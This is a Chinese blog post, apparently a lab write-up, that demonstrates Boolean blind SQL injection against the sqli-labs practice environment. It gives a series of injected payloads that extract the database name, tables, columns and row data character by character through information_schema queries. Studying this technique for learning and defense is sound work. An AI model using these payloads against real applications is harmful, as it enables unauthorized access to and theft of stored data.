<!DOCTYPE html>
<html lang="en">

<!-- Head tag -->
<head><meta name="generator" content="Hexo 3.9.0">

    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <!--Description-->

    

    
        <meta name="description" content="测试环境：sqli-labs
测试过程：首先判断是否存在注入，在id后尝试加上-1或‘或“，观察页面是否存在变化，测试后判断id后数据为字符型，
然后判断是否存在Boolean注入，id后加单引号，页面出现错误，不加单引号，则显示正常，说明有存在Boolean型注入；

判断存在Boolean注入后">
    

    <!--Author-->
    
        <meta name="author" content="rtzovida">
    

    <!--Open Graph Title-->
    
        <meta property="og:title" content="Boolean盲注的测试">
    

    <!--Open Graph Description-->
    
        <meta property="og:description" content="测试环境：sqli-labs
测试过程：首先判断是否存在注入，在id后尝试加上-1或‘或“，观察页面是否存在变化，测试后判断id后数据为字符型，
然后判断是否存在Boolean注入，id后加单引号，页面出现错误，不加单引号，则显示正常，说明有存在Boolean型注入；

判断存在Boolean注入后">
    

    <!--Open Graph Site Name-->
        <meta property="og:site_name" content="Zovida">

    <!--Type page-->
    
        <meta property="og:type" content="article">
    

    <!--Page Cover-->
    
    
        <meta property="og:image" content="http://yoursite.comhttps://b2.bmp.ovh/imgs/2019/07/15d0796a4a8b1ce3.png">
    

        <meta name="twitter:card" content="summary_large_image">

    

    
        <meta name="twitter:image" content="http://yoursite.comhttps://b2.bmp.ovh/imgs/2019/07/15d0796a4a8b1ce3.png">
    

    <!-- Title -->
    
    <title>Boolean盲注的测试 - Zovida</title>

    <!-- Bootstrap Core CSS -->
    <link href="//maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css" rel="stylesheet">

    <!-- Custom CSS -->
    <link rel="stylesheet" href="/css/style.css">

    <!-- Custom Fonts -->
    <link href="//maxcdn.bootstrapcdn.com/font-awesome/4.6.3/css/font-awesome.min.css" rel="stylesheet" type="text/css">
    <link href="//fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic" rel="stylesheet" type="text/css">
    <link href="//fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800" rel="stylesheet" type="text/css">

    <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
    <!--[if lt IE 9]>
    <script src="//oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
    <script src="//oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
    <![endif]-->

    <!-- Gallery -->
    <link href="//cdnjs.cloudflare.com/ajax/libs/featherlight/1.3.5/featherlight.min.css" type="text/css" rel="stylesheet">

    <!-- Google Analytics -->
    


    <!-- favicon -->
    

</head>


<body>

    <!-- Menu -->
    <!-- Navigation -->
<nav class="navbar navbar-default navbar-custom navbar-fixed-top">
    <div class="container-fluid">
        <!-- Brand and toggle get grouped for better mobile display -->
        <div class="navbar-header page-scroll">
            <button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1">
                <span class="sr-only">Toggle navigation</span>
                <span class="icon-bar"></span>
                <span class="icon-bar"></span>
                <span class="icon-bar"></span>
            </button>
            <a class="navbar-brand" href="/">Configurable Title</a>
        </div>

        <!-- Collect the nav links, forms, and other content for toggling -->
        <div class="collapse navbar-collapse" id="bs-example-navbar-collapse-1">
            <ul class="nav navbar-nav navbar-right">
                
                    <li>
                        <a href="/">
                            
                                Home
                            
                        </a>
                    </li>
                
                    <li>
                        <a href="/archives">
                            
                                Archives
                            
                        </a>
                    </li>
                
                    <li>
                        <a href="/tags">
                            
                                Tags
                            
                        </a>
                    </li>
                
                    <li>
                        <a href="/categories">
                            
                                Categories
                            
                        </a>
                    </li>
                
                    <li>
                        <a href="https://github.com/klugjo/hexo-theme-clean-blog">
                            
                                <i class="fa fa-github fa-stack-2x"></i>
                            
                        </a>
                    </li>
                
            </ul>
        </div>
        <!-- /.navbar-collapse -->
    </div>
    <!-- /.container -->
</nav>

    <!-- Main Content -->
    <!-- Page Header -->
<!-- Set your background image for this header in your post front-matter: cover -->

<header class="intro-header" style="background-image: url('https://b2.bmp.ovh/imgs/2019/07/15d0796a4a8b1ce3.png')">
    <div class="container">
        <div class="row">
            <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
                <div class="post-heading">
                    <h1>Boolean盲注的测试</h1>
                    
                    <span class="meta">
                        <!-- Date and Author -->
                        
                        
                            2019-09-10
                        
                    </span>
                </div>
            </div>
        </div>
    </div>
</header>

<!-- Post Content -->
<article>
    <div class="container">
        <div class="row">

            <!-- Tags and categories -->
           

            <!-- Gallery -->
            

            <!-- Post Main Content -->
            <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
                <p>测试环境：sqli-labs</p>
<p>测试过程：<br>首先判断是否存在注入，在id后尝试加上-1或‘或“，观察页面是否存在变化，测试后判断id后数据为字符型，</p>
<p>然后判断是否存在Boolean注入，id后加单引号，页面出现错误，不加单引号，则显示正常，说明有存在Boolean型注入；</p>
<p><img src="/img/Boolean/01.png" alt></p>
<p>判断存在Boolean注入后，通过在id后加上</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">' and length(database())&gt;10 --+</span></span><br></pre></td></tr></table></figure>

<p>通过改变10所在位置的数字来判断当前数据库名字的长度，当&gt;7时页面显示正确，&gt;8时页面显示错误，由此得到当前数据库的长度为8；</p>
<p><img src="/img/Boolean/02.png" alt></p>
<p>在id后加上</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">' and ascii(substr(database(),1,1))&gt;1--+</span></span><br></pre></td></tr></table></figure>

<p>通过改变&gt;1处1的数值求得当前数据库的第一个字母为多少，1为ASCII码十进制值，求得第一位所代表的ASCII码为115，查询表单得知为’s’，后续可通过改变substr的查询位数来查询不同位置的字母，最后求得当前数据库名为’security’；</p>
<p><img src="/img/Boolean/03.png" alt></p>
<p>在id后加上</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">' and (select count(distinct table_name) from information_schema.tables where table_schema = '</span>security<span class="string">')&gt;5 --+</span></span><br></pre></td></tr></table></figure>

<p>在&gt;5处替换不同的数值来查询当前数据库的表数量，通过查询得知为4；</p>
<p><img src="/img/Boolean/04.png" alt></p>
<p>在id后加上</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">' and length((select table_name from information_schema.tables where table_schema ='</span>security<span class="string">' limit 0,1))&gt;5 --+</span></span><br></pre></td></tr></table></figure>

<p>在&gt;5的位置替换为不同的数值来猜测当前数据库的第一个表长度值，查询后得知为6；</p>
<p><img src="/img/Boolean/05.png" alt></p>
<p>再通过在id后加上</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">' and ascii(substr((select table_name from information_schema.tables where table_schema = '</span>security<span class="string">' limit 0,1),1,1))&gt;10--+</span></span><br></pre></td></tr></table></figure>

<p>在&gt;10的位置替换数值来查询当前数据库第一个表单的第一个字母的ASCII码，得到该数值为’101’，通过查询得知为’e’，后续字母通过改变substr的查询位数得知第一个表单名为’emails’；</p>
<p><img src="/img/Boolean/06.png" alt></p>
<p>在id后加上</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">' and (select count(distinct column_name) from information_schema.columns where table_schema = '</span>security<span class="string">' and table_name = '</span>emails<span class="string">')&gt;5 --+</span></span><br></pre></td></tr></table></figure>

<p>在&gt;5的位置通过替换数值来查询’emails’表单里有几个字段，查询得知有两个字段；</p>
<p><img src="/img/Boolean/07.png" alt></p>
<p>再在id后加上</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">' and length((select column_name from information_schema.columns where table_schema='</span>security<span class="string">' and table_name = '</span>emails<span class="string">' limit 0,1))&gt;5 --+</span></span><br></pre></td></tr></table></figure>

<p>在&gt;5的位置替换数值得到第一个字段的长度，查询得知为2；</p>
<p><img src="/img/Boolean/08.png" alt></p>
<p>之后在id后加上</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">' and ascii(substr((select column_name from information_schema.columns where table_schema='</span>security<span class="string">' and table_name='</span>emails<span class="string">' limit 0,1),1,1))&gt;10 --+</span></span><br></pre></td></tr></table></figure>

<p>在&gt;10的位置替换数字来得到第一个字段的第一个字母的ASCII码值，该数值为’105’，通过查询得到为’i’，改变substr的查询范围得知第一个字段为’id’；</p>
<p><img src="/img/Boolean/09.png" alt></p>
<p>在id后加上</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">' and (select count(distinct id )from security.emails)&gt;5 --+</span></span><br></pre></td></tr></table></figure>

<p>在&gt;5的位置替换数值可以查询id字段里面的数据量，查询得知为8条数据；</p>
<p><img src="/img/Boolean/10.png" alt></p>
<p>在id后加上</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">' and length((select id from security.emails limit 0,1))&gt;5 --+</span></span><br></pre></td></tr></table></figure>

<p>在&gt;5的位置替换数值可以查询第一条数据的长度，查询得知为1；</p>
<p><img src="/img/Boolean/11.png" alt></p>
<p>在id后加上</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">' and ascii((select id from security.emails limit 0,1))&gt;5 --+</span></span><br></pre></td></tr></table></figure>

<p>在&gt;5的位置替换数值可以查询第一条数据的值，查询得知为数值为49，查询ASCII码表得知对应的数为’1’。</p>
<p><img src="/img/Boolean/12.png" alt></p>
<p>至此可以获得表单里面的数据。<br>后续若想获取其他数据库、表单、字段里面的数据，可进行类似的操作，只需将数值进行改变即可。</p>


                
            </div>

            <!-- Comments -->
            
                <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
                    


                </div>
            
        </div>
    </div>
</article>

    <!-- Footer -->
    <hr />

<!-- Footer -->
<footer>
    <div class="container">
        <div class="row">
            <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
                <ul class="list-inline text-center">
                    

                    

                    
                        <li>
                            <a href="https://github.com/klugjo/hexo-theme-clean-blog" target="_blank">
                                <span class="fa-stack fa-lg">
                                    <i class="fa fa-circle fa-stack-2x"></i>
                                    <i class="fa fa-github fa-stack-1x fa-inverse"></i>
                                </span>
                            </a>
                        </li>
                    

                    

                    

                    
                </ul>
                <p class="copyright text-muted">&copy; 2019 rtzovida<br></p>
                <p class="copyright text-muted">Original Theme <a target="_blank" href="http://startbootstrap.com/template-overviews/clean-blog/">Clean Blog</a> from <a href="http://startbootstrap.com/" target="_blank">Start Bootstrap</a></p>
                <p class="copyright text-muted">Adapted for <a target="_blank" href="https://hexo.io/">Hexo</a> by <a href="http://www.codeblocq.com/" target="_blank">Jonathan Klughertz</a></p>
            </div>
        </div>
    </div>
</footer>


    <!-- After footer scripts -->
    
<!-- jQuery -->
<script src="//code.jquery.com/jquery-2.1.4.min.js"></script>

<!-- Bootstrap -->
<script src="//maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js"></script>

<!-- Gallery -->
<script src="//cdnjs.cloudflare.com/ajax/libs/featherlight/1.3.5/featherlight.min.js" type="text/javascript" charset="utf-8"></script>

<!-- Disqus Comments -->



</body>

</html>